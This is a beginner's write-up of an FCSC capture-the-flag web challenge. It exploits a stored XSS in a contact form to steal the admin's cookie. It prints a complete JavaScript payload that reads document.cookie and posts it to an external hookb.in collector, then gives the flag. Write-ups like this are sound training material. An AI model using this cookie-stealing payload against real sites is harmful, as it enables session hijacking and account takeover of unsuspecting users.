This challenge was an introduction one, made for beginners like me.

Looking at the webapp

The web application is located at http://challenges2.france-cybersecurity-challenge.fr:5001/

If we use the search bar :

Looking at the url gives us : http://challenges2.france-cybersecurity-challenge.fr:5001/index.php?search=I+love+cybersecurity+%21

As the tags of the challenge mentioned XSS, I knew where to look at.

In the contact page , we have an URL input field for found bugs. It looks like a stored XSS…

Exploiting the contact page

If we have a contact page, it is likely for the admin to click on links we give him. Our goal is to steal his cookie. The solution I used (I don’t know if there are any different), was to make him send a request to a bin.

Here’s how it works :

We send a link to the admin with a JS HTTP request in URL. Then we wait for him to click on our link and we can steal his cookie.

For this challenge, I used HookBin which is free and damn simple to use.

Here is the script to steak the cookie :

<script>
var xhr = new XMLHttpRequest();

xhr.open("POST", "https://hookb.in/<your_hookbin_id_here>", true);
xhr.setRequestHeader("Content-Type", "application/json");
xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");

xhr.onreadystatechange = function () {
    if (xhr.readyState === 4 && xhr.status === 200) {
        console.log("done.");
    }
};

var data = JSON.stringify({
    "COOKIE": document.cookie
});

xhr.send(data);
</script>

But putting this script as-is in the url won’t work. We have to encode this to URL format. As a MacBook user, I tend to use Boop to do this kind of stuff.

Then by doing ⌘ + B and typing URL Encode, here’s the result :

Receiving the request

This picture show what’s the result is when the admin clicks on our link :

So we’ve stolen the admin cookie and gained 20 points… Which is pretty nice for an absolute n00b like me 😉

Flag : FCSC{4e0451cc88a9a96e7e46947461382008d8c8f4304373b8907964675c27d7c633}